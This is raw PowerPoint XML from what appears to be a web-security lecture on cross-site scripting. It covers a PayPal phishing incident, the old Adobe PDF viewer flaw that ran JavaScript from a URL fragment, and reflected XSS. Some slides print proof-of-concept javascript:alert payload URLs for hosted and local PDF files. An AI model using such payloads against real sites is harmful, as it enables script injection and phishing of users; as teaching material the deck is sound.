            <a:ext cx="2638425" cy="400050"/>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17423" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="19494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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17424" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="26066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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17425" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2714625" y="37052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17426" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324350"/>
            <a:ext cx="3352800" cy="1162050"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17427" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2894013"/>
            <a:ext cx="3211512" cy="687387"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17428" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2846388" y="2749550"/>
            <a:ext cx="2305050" cy="400050"/>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17429" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="30480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17430" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2028825" y="40068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sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1676400"/>
            <a:ext cx="1685925" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17432" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2046288" y="2303463"/>
            <a:ext cx="3440112" cy="773112"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxn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            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0"/>
              <a:t>2006 Example Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Attackers contacted users via email and fooled them into accessing a particular URL hosted on the legitimate PayPal website. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Injected code redirected PayPal visitors to a page warning users their accounts had been compromised. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Victims were then redirected to a phishing site and prompted to enter sensitive financial data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>			Source: http://www.acunetix.com/news/paypal.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18436" name="Picture 2" descr="PayPal">
            <a:hlinkClick r:id="rId2"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect r="41667"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="736600" y="533400"/>
            <a:ext cx="1778000" cy="762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American Express Site</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1795055"/>
            <a:ext cx="6756400" cy="4711700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1552183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0600" y="2209800"/>
            <a:ext cx="7543800" cy="1016000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Adobe PDF viewer “feature”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19460" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>PDF documents execute JavaScript code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>code_here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The code will be executed in the context of the domain where the PDF files is hosted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>This could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t> be used against PDF files hosted on the local filesystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19461" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="1047750"/>
            <a:ext cx="2058988" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(version &lt;= 7.9)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19462" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="6215063"/>
            <a:ext cx="8550275" cy="338137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://jeremiahgrossman.blogspot.com/2007/01/what-you-need-to-know-about-uxss-in.html</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3048000"/>
            <a:ext cx="7620000" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Here’s how the attack works:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20484" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1600200"/>
            <a:ext cx="7924800" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attacker locates a PDF file hosted on website.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attacker creates a URL pointing to the PDF, with JavaScript Malware in the fragment portion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  http://website.com/path/to/file.pdf#s=javascript:alert(”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”);) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attacker entices a victim to click on the link </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If the victim has Adobe Acrobat Reader </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Plugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 7.0.x or less, confirmed in Firefox and Internet Explorer, the JavaScript Malware executes </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6248400"/>
            <a:ext cx="7494167" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note: alert is just an example. Real attacks do something worse.</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2362200"/>
            <a:ext cx="7543800" cy="1631950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>And if that doesn’t bother you...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>PDF files on the local filesystem:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>file:///C:/Program%20Files/Adobe/Acrobat%207.0/Resource/ENUtxt.pdf#blah=javascript:alert("XSS");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>JavaScript Malware now runs in local context with the ability to read local files ...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="304800"/>
            <a:ext cx="8382000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Reflected XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24579" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2601913"/>
            <a:ext cx="1436688" cy="1436687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24580" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5959475" y="4979988"/>
            <a:ext cx="1155700" cy="1420812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24581" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5564188" y="1905000"/>
            <a:ext cx="2436812" cy="846138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24582" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="15240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24583" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="4552950"/>
            <a:ext cx="17605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24584" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1920875"/>
            <a:ext cx="3211512" cy="687388"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24585" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3886200"/>
            <a:ext cx="14652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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24586"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24587" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3049588" y="4070350"/>
            <a:ext cx="1654175" cy="400050"/>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24588" name="TextBox 29"/>
